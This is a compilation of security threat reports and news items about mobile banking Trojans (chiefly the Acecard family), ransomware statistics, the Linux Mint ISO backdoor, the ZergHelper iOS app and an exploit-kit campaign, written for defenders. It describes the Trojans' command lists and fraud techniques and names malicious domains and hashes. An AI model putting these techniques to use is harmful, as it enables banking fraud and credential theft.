These Trojans are designed to steal mobile bank accounts of the largest Korean banks as well as mTans. In Australia, the Trojan-Banker.AndroidOS.Acecard family was responsible for most infection attempts.

This family is a new stage in the evolution of Backdoor.AndroidOS.Torec.a, the first Trojan for Android that made use of Tor. We detected this Trojan at the beginning of 2014, while the first banking modifications appeared in mid-2014.

At that time the Trojan was distributed mainly in Russia, and only in 2015 did it begin to spread actively in Australia. One modification, which we detected in November 2015, is able to overlay the interfaces of 24 banking apps with a phishing window.

Five of those apps belong to Australian banks, another four each belong to banks based in Hong Kong, Austria and New Zealand, three each to banks in Germany and Singapore, plus the PayPal app.
In addition, there are modifications which target banks in the US and Russia. Phishing windows of the Acecard Trojan Stealing user logins and passwords by displaying a phishing window instead of the genuine app interface is not a new trick. We first came across it back in 2013 in Trojan-SMS.AndroidOS.Svpeng.
In our IT threat evolution in Q1 2015 report we mentioned Trojan-SMS.AndroidOS.OpFake.cc which was capable of attacking at least 29 banking and financial apps.

The latest modification of this Trojan can now attack 114 banking and financial apps.
Its main goal is to steal the login credentials for bank accounts.
It also overlays the windows of several popular mail applications. In Russia, which ranked third in the TOP 10, Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher were the most popular programs used by attackers. Starting in April, we saw a sharp drop in the number of attempts to infect users with representatives of the Trojan-Banker.AndroidOS.Marcher family.

During the five months from April to August, the number of attacks using this Trojan decreased fivefold.
It is possible that the cybercriminals were preparing attacks on users in other countries during that time, because until September 2015 activity by this family was limited almost exclusively to Russia.

From September, however, about 30% of the attacks using this Trojan targeted users in Australia, Germany and France. The aforementioned Trojan-Spy.AndroidOS.SmsThief.fc was distributed in Russia.

The attackers added their code to the original banking app without affecting its performance, making this Trojan more difficult to detect. Mobile Trojan-Ransom In 2015, the amount of the Trojan-Ransom families doubled compared to 2014.

The number of modifications detected during the same period increased 3.5 times and accounted for 6,924. Over the reporting period, mobile ransomware attacked 94,344 unique users which is five times more than in 2014 (18,478).

The share of unique users attacked by Trojan-Ransom programs relative to all users attacked by mobile malware increased from 1.1% to 3.8% during the year. Mobile ransomware attacks were registered in 156 countries and territories at least once during the year. Geography of mobile ransomware threats in 2015 (number of users attacked) TOP 10 countries attacked by Trojan-Ransom malware by the number of attacked users: Country Number of attacked users 1 Russia 44951 2 Germany 15950 3 Kazakhstan 8374 4 US 5371 5 Ukraine 4250 6 UK 2878 7 Italy 1313 8 Spain 1062 9 Iran 866 10 India 757 Russia, Germany and Kazakhstan were the countries attacked most often by ransomware. In Russia and Kazakhstan, the Trojan-Ransom.AndroidOS.Small family was most active, in particular the modification Trojan-Ransom.AndroidOS.Small.o, the most popular Trojan-Ransom program in 2015. The Trojan-Ransom.AndroidOS.Pletor family also remained very popular in 2015.
Interestingly, this first mobile encryptor Trojan was developed by the same group of cybercriminals as Trojan-Banker.AndroidOS.Acecard. In Germany, Trojan-Ransom.AndroidOS.Fusob was the most actively distributed family. Windows opened by the Fusob Trojan The US came fourth in the ranking.

The Trojan-Ransom.AndroidOS.Fusob family was especially popular in the country, although the Trojan-Ransom.AndroidOS.Svpeng family was also actively used. This ranking depends to a large extent on the number of users in each country, so it is interesting to view a rating that shows the proportion of users attacked by Trojan-Ransom malware relative to all attacked users in the country. TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country. Country % of all attacked users* 1 Kazakhstan 15.1 2 Germany 14.5 3 US 10.3 4 Canada 8.9 5 Netherlands 8.8 6 UK 8.3 7 Switzerland 6.9 8 Austria 6.4 9 Ukraine 5.9 10 Australia 5.5 * Percentage of users attacked by Trojan-Ransom malware, relative to all attacked users of Kaspersky Lab’s mobile security products in the country Russia, which accounted for the largest number of attacked users, was not in the TOP 10.

The leaders of the ranking were Kazakhstan, Germany and the US. Conclusion Despite the fact that the first advertising Trojans exploiting super-user privileges for their own purposes appeared a few years ago, in 2015 their number increased substantially and started spreading rapidly.
In the first quarter of 2015 the most popular threats included just one Trojan of this type, but by the end of the year these programs accounted for more than half of the TOP 20.

They are distributed using all available means – via other advertising programs, via app stores and can be even pre-installed in some devices.

The number of advertising Trojans using super-user privileges will most likely continue to grow in 2016. We have already seen cases when advertising Trojans were used to spread malicious mobile programs.

There is every reason to believe that attackers will increasingly use these Trojans to infect mobile devices with malware. We also came across cases where super-user privileges were utilized by other types of malware, especially ransomware. Trojan-Ransom malware is likely to continue evolving in 2016. We expect the popularity of these programs among attackers to grow and their global reach to increase. Another type of Trojan that we intend to continue monitoring closely in 2016 is Trojan-Banker.

There are already lots of banking Trojans that do not require additional software on the victim’s computer.

These Trojans operate independently, and only need to infect the user’s phone to steal his money.

They are able to steal logins and passwords for mobile banking accounts by overlaying the legitimate banking app interfaces with a phishing window.

The Trojans can also steal credit card data using phishing windows.
In addition, they have functionality to intercept communications between a client and a bank – stealing incoming text messages and forwarding calls to the attacker.
In 2016, banking Trojans will attack even more banking institutions and will use new distribution channels and new data theft technologies. As the functionality of mobile devices and mobile services grows, the appetite of cybercriminals who profit from mobile malware will grow too. Malware authors will continue to improve their creations, develop new technologies and look for new ways of spreading mobile malware.

Their main aim is to make money.
In these circumstances, neglecting to protect your mobile devices is extremely risky.
GM Bot can rip creds, steal SMS and phone two factor tokens Android users could be hit with a new wave of dangerous banking malware following the leak of source code for a capable Android trojan. Users could be targeted with variants of the malware, known as "GM Bot", that is capable of harvesting usernames and passwords using slick keystroke-capturing website overlays. Since it infects mobile handsets it can steal two factor authentication including SMS and even redirect phone calls. IBM threat bod Limor Kessem says the leak appears to have come from a GM Bot buyer and is bad news for users. "This turnkey capability is the true differentiator; previous mobile malware could steal SMS codes, but those would have been meaningless without phishing schemes or a trojan on the victim’s PC to steal access credentials," Kessem says. "The reverse was also true: phishers and PC trojan operators could not facilitate fraudulent transactions without mobile malware to intercept the SMS codes or calls from the bank. "In short, mobile banking trojans such as GM Bot are a one-stop fraud shop for criminals." Attackers can target any website or banking app to harvest credentials and tokens from infected phones. GM Bot was first discovered late last year when CERT Poland described the malware as a simple but effective bank raiding tool. The CERT's researchers said of the malware that "... the attacker needs only to infect the Android phone and there is no need for a Windows counterpart." The malware joins the ranks of other leaked PC trojans including Zeus, SpyEye, and Carberp. If history is a judge, it is likely the malware will result in various low- and high- quality spin-offs. Users should update their handsets to the latest Android versions which contain more rigorous security and permission checks.

Those who cannot upgrade from old versions on account of vendors no longer shipping updates can consider installing custom but well-supported-and-maintained ROMs such as Cyanogenmod and NamelessROM. ® Sponsored: Building secure multi-factor authentication
Criminals are becoming more organized by employing teams of developers that create more sophisticated malware that produces larger monetary gains, states an IBM report. Cyber-criminals increasingly used customized malware, software-development expertise and knowledge of the financial system to make 2015 an extremely profitable year—a trend that will continue in 2016, according to IBM’s annual threat report, published on Feb. 22.Using three families of malware—Dyre, Dridex and Carbanak—cyber-criminals have stolen hundreds of millions of U.S. dollars. Over two years, for example, the Carbanak malware infiltrated as many as 100 financial institutions to steal an estimated $1 billion, a brazen heist that came to light last year.The trend departs from the traditional image of a cybercriminal: The lone, amateur criminal who typically focused on smaller thefts from consumer accounts, Limor Kessem, security researcher for IBM’s X-Force research group, told eWEEK.The evolution toward more sophisticated, highly organized cyber-crime that results in higher loses will likely continue in 2016, the IBM report stated. “From the nature of those organized groups, they bring that research and the planning and the resources that … has helped them push their ability to make so much money at once,” Kessem said. “Even just a couple of years ago, we did not see $1 million, $3.5 million and $5 million transfers.” The maturing of the criminal ecosystem is one of the major trends noted in information security this year, according to IBM.

About 18 percent of attacks detected by IBM used some form of malware, representing the largest category of threats recorded in 2015, according to the report.

Distributed denial-of-service attacks accounted for about 15 percent of threats and attacks on misconfigured systems and networks for about 8 percent.In a separate threat report, Dell SonicWALL stated its products had captured 64 million malware variants attacking customers, up from 37 million the year before.Four families of malware–Dyre, Neverquest, Bugat, also known as Dridex, and Zeus V2 – made up nearly three-quarters of all malware attacks recorded by IBM in 2015.On its own, the group behind the Dyre malware accounted for 24 percent of attacks detected by the firm.

The group, however, has largely been silent since late November. Some media outlets have reported that members of the group have been arrested by Russian law enforcement, but Russian authorities have not confirmed the arrests.The behavior of the groups behind Dyre and Dridex show significant similarities, suggesting–at the very least–that they may be using the same playbook, Kessem said.“Everything that Dyre was doing, Dridex was suddenly doing,” she said. “The same techniques, the same sorts of things.

The redirection attacks that Dyre came up with, (for example) all the sudden Dridex was launching them.”With the sudden disappearance of Dyre in November, other malware has topped the charts. Now, Neverquest, Dridex, Zeus V2, and a fourth program, Gozi, make up three-quarters of all attacks, according to Kessem.IBM’s report focused on a few other areas of the threat landscape as well.

The number of vulnerabilities reported during the year did not change in 2015, while mobile malware started taking off, the company said.The most targeted industries included computer services, which were the victims in more than 30 percent of attacks followed by retail, 15 percent, and healthcare 9 percent.Both Dell and IBM noted an increase in mobile malware targeting the financial industry.
Attackers manage to breach Linux Mint's security, adding a backdoor to the distribution and even stealing information from user forums. The Linux Mint operating system community is reeling today after the public disclosure on Feb. 21 that hackers managed to infiltrate the popular Linux distribution and plant a backdoor in the system.

Adding further insult to injury, hackers were also able to compromise the Linux Mint user forum, stealing username and password information.

As a result of the attack, the LinuxMint.com Website is now offline as the distribution scrambles to restore confidence and security.Linux Mint has emerged in recent years to become one of the most popular desktop Linux distributions in the world.

A key part of Linux Mint's popularity is its Cinnamon desktop, which provides users with a different user interface from the more standard GNOME desktop. Linux Mint does, however, offer other desktop choices to users as well.It appears that on Feb. 20 the attackers were only able to impact the most recent Linux Mint 17.3 Cinnamon edition (which eWEEK reviewed here), according to Clement Lefebvre, founder of Linux Mint.Lefebvre noted the intrusion was brief and quickly discovered. "Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it," he  wrote. In addition to the hacked Linux Mint 17.3 Cinnamon Edition download, the attackers also compromised the user forums site (forums.linuxmint.com), stealing a copy of the entire database. Hackers now have usernames and passwords used on the Linux Mint forum Websites, and so it is imperative that users make sure they aren't using the same username/password combination on other sites. In terms of root cause for the breach of Linux Mint's security, the finger is being pointed at a security issue with a poorly configured WordPress content management system (CMS) component."We found an uploaded php backdoor in the theme directory of a wordpress installation, which was one day old and had no plugins running," Lefebvre commented.Lefebvre explained that the WordPress theme was new and was set up with incomplete file permissions. the vulnerability was not an exploit of the WordPress core application and that Linux Mint is running the latest version of WordPress, he said.  The WordPress 4.4.2 update  debuted at the beginning of February, patching a pair of security flaws.After gaining access to the Linux Mint Website by way of the vulnerable WordPress theme component, the attackers were able to point the Linux Mint 17.3 Cinnamon edition download link to a malicious version of the operating system that embeds the Tsunami Trojan.

Tsunami is not a new form of malware, and it's not unique to Linux either.

Back in 2011, Tsunami was able to hijack Apple Mac OS X systems in order to launch distributed denial-of-service (DDoS) attacks.In regard to who is responsible for the attack, Linux Mint has identified that the hacked versions of its operating system were pointed to servers located in Sofia, Bulgaria."What we don't know is the motivation behind this attack," Lefebvre wrote. "If more efforts are made to attack our project and if the goal is to hurt us, we'll get in touch with authorities and security firms to confront the people behind this."Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com.

Follow him on Twitter @TechJournalist.
A Chinese iOS application recently found on Apple's official store contained hidden features that allow users to install pirated apps on non-jailbroken devices.
Its creators took advantage of a relatively new feature that lets iOS developers obtain free code-signing certificates for limited app deployment and testing. The number of malware programs for iOS has been very low until now primarily because of Apple's strict control of its ecosystem.

Devices that have not been jailbroken -- having their security restrictions removed -- only allow apps obtained from the official App Store, after they've been reviewed and approved by Apple. There is a separate method for enterprises to distribute in-house developed apps to iOS devices without publishing them on the app store, but it relies on special code- signing certificates obtained through the Apple Developer Enterprise Program. Enterprise certificates have been used to install malware on non-jailbroken iOS devices in the past and it is one of the techniques used the newly found Chinese app, which is called ZergHelper or XY Helper. However, it's not the most interesting one. According to researchers from security firm Palo Alto Networks, ZergHelper also abuses personal development certificates, a new type of code-signing certificate introduced by Apple with the release of Xcode 7.0 in September. Xcode is the main tool -- or integrated development environment (IDE) -- used to develop iOS and Mac OS X apps. Starting with Xcode 7, developers can build apps, sign them and have them run on their own devices without publishing them in the app store.

This makes it a lot easier to test apps without enrolling in Apple's Developer Program, which requires a $99 per year subscription. To generate personal development certificates, app makers have to use Xcode with their phone connected to their computer.

The exact process in which Xcode obtains the certificates from Apple is not publicly documented, but the ZergHelper creators seem to have figured it out. "We think someone has reverse-engineered Xcode in detail to analyze this part of code so that they can implement exactly the same behaviors with Xcode -- in effect, successfully cheating Apple’s server," the Palo Alto Networks researchers said in a blog post. Some people have expressed concerns after the feature was released last year that attackers might abuse it to create and distribute malware to non-jailbroken devices. ZergHelper is evidence that this is indeed possible, highlighting its potential for abuse "in a wide-ranging and automated way," the researchers said. In fact, someone was recently selling code on a popular Chinese security forum that could automatically register Apple IDs and then generate personal development certificates for them.

That post has since been deleted, the researchers said. ZergHelper is also providing free Apple IDs to users and it's not clear where those IDs are coming from and whether the app steals them from other devices.

The app was available in the official app store from the end of October until Saturday, when Apple removed it after being alerted by Palo Alto Networks. The company's researchers found no explicitly malicious behavior in ZergHelper so far, its main goal being to act as an alternative app store that allows users to install cracked games and other pirated apps without jailbreaking their iOS devices. Its creators appear to have tricked Apple's reviewers by using simple tricks.

The app was submitted to the app store under the name "Happy Daily English" (in Chinese) and was presented as a helper app for learning English. Once installed on a phone, the app behaved as advertised if the user's IP (Internet Protocol) address was from outside mainland China. However, if the address was from China, a different interface would appear that would guide users through installing a provisioning profile.

This is similar to the process that a device goes through when it's enrolled into a mobile device management system. Once done, users could install apps from the alternative app store. Some of them were signed with stolen enterprise certificates, but others were signed with the new personal development certificates that Xcode generates for free. "We don’t know where the App Store reviewers are located," the Palo Alto Networks researchers said. "If they are not located in mainland China, this method could trick them into seeing a legitimate app.

Even if they’re in China, the author could just shut down that webpage during the review period so that reviewer could not see the actual functionality through an analysis of its behavior." The app also used another increasingly popular technique that allows developers to dynamically change their apps' code without submitting a new version to the official app store for review.

This was done by integrating a framework called wax that bridges Lua scripting to native iOS Objective-C methods. While ZergHelper is not malware per se, the techniques it uses could inspire future malicious attacks. Stolen enterprise certficates have been abused in the past, but ZergHelper takes it one step further by automatically generating free personal development certificates. "This is of concern because the abuse of these certificates may be the first step toward future attacks," the Palo Alto Networks researchers said.
'Admedia' campaign decides the world of WordPress is not enough.


Bwahahahaha! The Internet Storm Center (ISC) has spotted 'admedia attacks' breaking out of their original WordPress vectors. According to a post late last week, the ISC (courtesy of author Brad Duncan) posted that “the group behind the WordPress 'admedia' campaign” is now attacking Joomla-hosted sites. The other evolution in the campaign, Duncan notes, is that since it was first noticed at the beginning of this month mostly dropping the Nuclear exploit kit on target sites, it's now added Angler. Duncan, who is also a security researcher at Rackspace, also notes that the attackers have started using “megaadvertize” in their gateway URLs (instead of “admedia” as was used when the attack was first spotted). The technique, however, stays the same: the target site is compromised to generate hidden iframes in visitors' browsers, and the malicious URLs act as a “gate between the compromised Website and the EK [exploit kit – The Register] server”. The overall process, however, remains the same.

For example: - img.belayamorda.info - admedia gate; - ssd.summerspellman.com - Angler EK - clothdiapersexpert.com - TeslaCrypt callback traffic As before, Duncan writes, a script injection was the initial attack, with the JavaScript files from the compromised site carrying appended malicious scripts.

From there it's a short walk to ransomware hell. ® Sponsored: Building secure multi-factor authentication

The Evolution of Acecard

While working on the IT Threat Evolution report for Q3 2015, we discovered that Australia had become the leading country in terms of number of users attacked by mobile banker Trojans. We decided to find out what was behind this jump in activity and managed to identify the cause: Trojan-Banker.AndroidOS.Acecard.

This family accounted for almost all the banker Trojan attacks in Australia. After analyzing all the known malware modifications in this family, we established that they attack a large number of different applications.
In particular, the targets include nine official social media apps that the Trojan attacks in order to steal passwords.

Two other apps are targeted by the Trojan for their credit card details.

But most interestingly, the list includes nearly 50 financial apps (client software for leading global payment systems and banks) and services, and the various modifications of Acecard make use of all the tools at their disposal to attack them – from stealing bank text messages to overlaying official app windows with phishing messages. Here is another interesting fact that we established while investigating the Trojan: the modifications of Acecard were written by the same cybercriminals who earlier created Backdoor.AndroidOS.Torec.a, the first TOR Trojan for Android, as well as Trojan-Ransom.AndroidOS.Pletor.a, the first encryptor for mobile devices.

All three Trojans run on Android. How it all started Given Acecard’s growing popularity and the rich criminal past of its creators, we decided to delve deeper into the history of this malware family. It all started with Backdoor.AndroidOS.Torec.a.

The first version of this malicious program was detected in February 2014 and could perform the following commands from the C&C server: #intercept_sms_start – start intercepting incoming SMSs; #intercept_sms_stop – stop intercepting incoming SMSs; #ussd – create a USSD request; #listen_sms_start – start stealing incoming SMSs; #listen_sms_stop – stop stealing incoming SMSs; #check – send information about the phone (phone number, country of residence, IMEI, model, OS version) to C&C; #grab_apps – send a list of applications installed on the mobile device to the C&C; #send_sms – send an SMS to numbers specified in the command; #control_number – change the phone’s control number. Then, in April 2014, a new version emerged with more capabilities.

The additional commands were: #check_gps – send the device’s coordinates to the C&C; #block_numbers – add numbers to the SMS interception list; #unblock_all_numbers – clear the SMS interception list; #unblock_numbers – remove specified numbers from the SMS interception list; #sentid – send an SMS with the Trojan’s ID to a specified number. In late May 2014, we detected the first mobile encryptor, Trojan-Ransom.AndroidOS.Pletor.a.
It encrypted files on the device and demanded a ransom for them to be decrypted. Some modifications of Pletor used TOR to communicate with the C&C. A month later, we detected a new modification, Backdoor.AndroidOS.Torec. Unlike previous versions, it did not use TOR and targeted credit card details: the Trojan overlaid the official Google Play Store app with a phishing window that included data entry fields. We assigned the verdict Trojan-Banker.AndroidOS.Acecard.a to this modification, and classified it as a separate family of malware.

From that moment on, all new versions of the Trojan have been detected as belonging to the Acecard family. An analysis and comparison of the code used in Backdoor.AndroidOS.Torec.a, Trojan-Ransom.AndroidOS.Pletor.a and Trojan-Banker.AndroidOS.Acecard.a has shown they were all written by the same cybercriminals. Here are some clear examples: Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a Here is another example: Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a A lot of the class, method and variable names are the same for all three Trojans.

The code of the corresponding methods is either the same or very similar with only minor differences. Acecard’s progress The initial Trojan, Trojan-Banker.AndroidOS.Acecard.a, could only handle four commands sent from the C&C: #intercept_sms_start – start intercepting incoming SMSs; #intercept_sms_stop – stop intercepting incoming SMSs; #send_sms – send an SMS to the number specified in the command; #control_number – change the phone’s control number. The next modification of Acecard was detected in late August 2014 and used the TOR network for C&C communication, just like the earlier Pletor.

Besides that, we identified two more differences.

Firstly, the list of supported commands had grown to 15; nearly all of these commands had been seen before in earlier versions of the Trojan Torec: #intercept_sms_start – start intercepting incoming SMSs; #intercept_sms_stop – stop intercepting incoming SMSs; #ussd – create a USSD request; #check_gps – send the device’s coordinates to the C&C; #block_numbers – add numbers to the list of senders from which SMSs will be intercepted; #unblock_all_numbers – clear the SMS interception list; #unblock_numbers – remove specified numbers from the SMS interception list; #listen_sms_start – start stealing incoming SMSs; #listen_sms_stop – stop stealing incoming SMSs; #check – send the Trojan’s ID to the C&C; #grab_apps – send the list of applications installed on the mobile device to the C&C; #send_sms – send an SMS to the number specified in the command; #control_number – change the phone’s control number; #sentid – send an SMS with the Trojan’s ID to a specified number; #show_dialog – show a dialog window to the user with specific objects (data entry fields, buttons etc.) depending on the C&C command parameters. The second difference was the number of phishing windows.

Along with the official Google Play Store app, this Trojan now overlaid the display of the following apps with its own windows: IM services: WhatsApp, Viber, Instagram, Skype; The apps of the VKontakte, Odnoklassniki and Facebook social networks The Gmail client The official Twitter client In the second half of October 2014, we detected the next modification of Acecard.
It no longer used TOR (neither have any of the versions of the Trojan subsequently detected). However, there was another, more important difference: starting with this version of the Trojan, there have been dramatic changes in the geography of the targeted users.

The earlier versions mostly attacked users in Russia, but starting in October 2014 the bulk of Acecard attacks targeted users in Australia, Germany and France. Russia accounted for just 10% of the attacked users.

This trend continued for another four months, until February 2015, but even then Australia, Germany and France still remained among the most frequently attacked countries. At the same time, the geography of Pletor attacks remained largely unchanged: most attacks targeted, and continue to target, users in Russia and the US.

The TOP 5 most attacked countries also includes Ukraine, Belarus and Saudi Arabia. A new modification of Acecard emerged in mid-November 2014.

As well as stealing passwords from popular social network clients, it started to overlay the banking app of Australia’s most popular bank with a phishing window. Just two days later, we managed to detect another modification of this Trojan that was already attacking the apps of four Australian banks. This functionality has persisted up to the very latest Trojan-Banker.AndroidOS.Acecard modifications that we detect. This version of Acecard also checks the country code and the service provider code as it launches, and if it finds itself in Russia, it shuts down.

This check is carried out in almost all subsequent modifications.
Interestingly, similar changes to Trojan-Ransom.AndroidOS.Pletor only took place in late March 2015, and did not extend to all versions of the malware. For the next nine months, there was practically no change in the functionality of the new Acecard modifications that emerged, until early August 2015 when we detected a new version that was capable of overlaying the PayPal mobile app with its own phishing window. There was also a new command that this version could perform – #wipe. When this command is received, Acecard resets the mobile device to factory settings. It should be noted that there has been a dramatic increase in Acecard developer activity since June 2015.

Before, we typically identified 2-5 files a month related to this Trojan; since June we have detected around 20 files per month. Number of Acecard files detected each month The graph above shows the number of files associated with the banking Trojan Acecard that are detected each month; these include both the modifications of Acecard and related files, such as downloader Trojans.

The dramatic rise in file numbers detected in November and especially December is down to the malware writers making active use of a commercial code obfuscator and the emergence of obfuscated versions of the Trojan. Also at this time, there was an increase in the number of attacks using this malicious program. The number of unique users attacked by Acecard per month In the first half of September, we detected a new modification of Acecard.
Its new capabilities included overlaying the windows of more mobile banking apps, including those of one Australian bank, four New Zealand banks and three German banks. It means this modification of the Trojan is capable of overlaying 20 apps – including 13 banking apps – with a phishing window. The subsequent development of Acecard’s “banking business” then got even faster: The next modification emerged just several days later, and was capable of overlaying as many as 20 banking applications.

The list of targeted apps grew to include another app belonging to an Australian bank, four apps for Hong Kong banks and three for Austrian banks. In late September, a new modification came out with a new functionality: the malicious program included a list of bank phone numbers, so text messages arriving from those banks are redirected to the cybercriminal.

The Trojan has a list of phrases, so it can compare incoming text messages and identify those with verification codes for bank operations or registration, and send just the code to the cybercriminal, rather than the full SMS.

This version of Acecard intercepts SMSs from 17 Russian banks. Early October saw the emergence of a new modification that attacked the banking apps of the three largest US banks.
Interestingly, from the very start, the US has been among the TOP 10 countries most often attacked by this Trojan; however, December 2015 saw a dramatic rise in the number of attacks on US users.
In that month, the US came third in terms of the number of unique users attacked by this malware. In mid-October, a new modification appeared capable of overlaying as many as 24 financial applications, including apps belonging to five Australian banks, four Hong Kong banks, four Austrian banks, four New Zealand banks, three German banks, three Singapore banks, and the PayPal app. A new modification was detected in early November that has a phishing window that targets an app belonging to a Spanish bank. It should also be noted that virtually all versions of Acecard can handle a C&C command that orders the Trojan to overlay any specified app with its own window. Perhaps the cybercriminals thought this option was more promising, because many of the versions detected in November and December 2015 have a dedicated window that only overlays Google Play and Google Music apps to target credit card details. No other applications will be overlaid without first receiving the appropriate C&C command. The most recent versions of the Acecard family can attack the client applications of more than 30 banks and payment systems.

Considering that these Trojans are capable of overlaying any application upon command, the overall number of attacked financial applications may be much larger. Although the Trojans belonging to this family can attack users from a long list of countries, most attacks target users in Russia, Australia, Germany, Austria and France. Number of unique users attacked by country In Germany and Australia, the Trojan-Banker.AndroidOS.Acecard family is the most widespread type of mobile banker Trojan targeting users. Propagation In many countries, Trojans belonging to the Acecard family are typically distributed with the names Flash Player or PornoVideo, although other names are sometimes used in a bid to imitate useful and popular software.

This malware family also propagates with the help of downloader Trojans that are detected by Kaspersky Lab’s products as Trojan-Downloader.AndroidOS.Acecard. We should note that on 28 December we were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play Store. A Trojan-Downloader.AndroidOS.Acecard.b page in Google Play Store The Trojan propagates under the guise of a game, but in reality it has no useful functionality.

The main goal of this malicious app is to download and install a fully functional modification of the banking Trojan Acecard.
Its creators didn’t even bother to make it look like a legitimate application: when the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen. We have also been able to detect a new modification of the downloader Trojan, Trojan-Downloader.AndroidOS.Acecard.c.
It differs in that the Trojan, once launched, uses vulnerabilities in the system to gain super-user rights. With these privileges – Trojan-Downloader.AndroidOS.Acecard.c can install the banking Trojan Acecard into the system folder, which makes it impossible to delete using standard tools. However, in most cases this propagation method is used to spread another Trojan that we are already familiar with – Trojan-Ransom.AndroidOS.Pletor. The cybercriminals are using virtually every available method to propagate the banking Trojan Acecard, be it under the guise of another program, via official app stores, or via other Trojans.

This combination of propagation methods, which includes the exploitation of vulnerabilities in the operating system, along with Acecard’s capabilities make this mobile banker one of the most dangerous threats to users. MD5 58FED8B5B549BE7ECBFBC6C63B84A7288D260AB2BB36AEAF5B033B80B6BC1E6ACF872ACDC583FE80B8F54957E14355DFFBBCCD640CE75BD618A7F3187EC1B74201E8CEA7DF22B1B3CC560ACB049F8EA0DDCE6CE143CCA26E59063E7A4BB890199D34FC3CFCFFEA760FC1ADD377AA626A03DA636518CCAF432AB68B269F7E6CC305EBAA5C7FFA440455ECB3519F923B56E3FD483AD3731DD62FBE027B4E6880E653888352A4A1E3CB810B2A3F51D0BFC2E1C794A614D5F6AAC38E2AEB77B139DA54332ED8EA9AED12400A75496972D7D75DB57F89A85F647EBBC5BAFBC29C801E702770D70C7AAB793FFD6A107FD08DADCF25782CAC01837ABACBF31130CA4E7507DF64C87EA74F388EF86226BC39EADF